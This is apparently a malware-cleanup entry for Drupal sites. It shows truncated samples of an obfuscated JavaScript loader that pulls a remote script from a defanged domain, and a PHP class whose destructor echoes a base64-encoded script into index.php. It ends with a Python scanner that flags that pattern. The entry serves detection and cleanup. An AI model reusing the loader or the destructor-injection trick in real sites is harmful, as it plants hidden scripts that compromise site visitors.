Description:
Injection of an obfuscated script from hxxps://track.amishbrand[.]com/s_code.js?...
Typical sample:
<script>
;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}")];var y=document[m(":e}idk,owodc,")];if(s(x,m("0s7w)obd)n)i(W{"))&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)...skipped...o.parentNode.insertBefore(b,o);}}function m(v){var ...skipped...{var k='';for(var p=t.length-1;p>=0;p--){k+=t[p];}return k;}})();
</script>
Cleanup
This malware can be injected into the index.php files of Drupal sites in the form of the following PHP code, which must be removed to clean the site.
<?php
class SoFooterClass{
public $data = 'PHNjcmlwdD4KOyhmdW5jdGlvbigpe3ZhciB4PW5hdmlnYXRvclttKCI0d...skipped...ZXR1cm4gazt9fSkoKTsKPC9zY3JpcHQ+';
public function __destruct(){
echo base64_decode($this->data);
}
}
$sofooter = new SoFooterClass();
?>
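One way to locate the injected block before removing it, as an added example that is not part of the original write-up: the Python code below flags index.php files in which a class destructor echoes base64_decode() of a long string property that decodes to a script tag. The function names and the sample inputs are constructed for illustration, and a harmless placeholder stands in for the real payload.

```python
import base64
import os
import re

# Property holding a long base64 string literal, e.g. public $data = '...';
PROP_RE = re.compile(r"\$(\w+)\s*=\s*'([A-Za-z0-9+/=]{40,})'\s*;")
# Destructor that echoes base64_decode($this-><property>), as in the sample above.
DTOR_RE = re.compile(
    r"function\s+__destruct\s*\(\s*\)\s*\{\s*echo\s+base64_decode\s*"
    r"\(\s*\$this->(\w+)\s*\)\s*;")

def find_injected_blocks(php_source):
    """Return [(property, decoded_text)] where the echoed base64 decodes to a script tag."""
    props = dict(PROP_RE.findall(php_source))
    hits = []
    for name in DTOR_RE.findall(php_source):
        try:
            decoded = base64.b64decode(props.get(name, ""), validate=True)
        except ValueError:  # not valid base64, so not this pattern
            continue
        text = decoded.decode("utf-8", "replace")
        if "<script" in text.lower():
            hits.append((name, text))
    return hits

def scan_tree(root):
    """Check every index.php under root; return {path: hits} for flagged files."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        if "index.php" in files:
            path = os.path.join(dirpath, "index.php")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_injected_blocks(fh.read())
            if hits:
                flagged[path] = hits
    return flagged

# Constructed sample input: a harmless placeholder stands in for the real payload.
PLACEHOLDER = b"<script>/* constructed placeholder, not the real payload */</script>"
SAMPLE_INFECTED = (
    "<?php\nclass SoFooterClass{\npublic $data = '%s';\n"
    "public function __destruct(){\necho base64_decode($this->data);\n}\n}\n"
    "$sofooter = new SoFooterClass();\n?>\n<?php /* rest of index.php */ ?>\n"
) % base64.b64encode(PLACEHOLDER).decode()
SAMPLE_CLEAN = "<?php\n$cfg = 'no destructor here';\n?>\n"

if __name__ == "__main__":
    print(find_injected_blocks(SAMPLE_INFECTED))
```

Run scan_tree() against the Drupal docroot and review each flagged file by hand; the match is on structure rather than on the class name, so a renamed copy of the same block is still reported.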
Affecting:
Drupal.
Mitigation:
How to clean a hacked Drupal site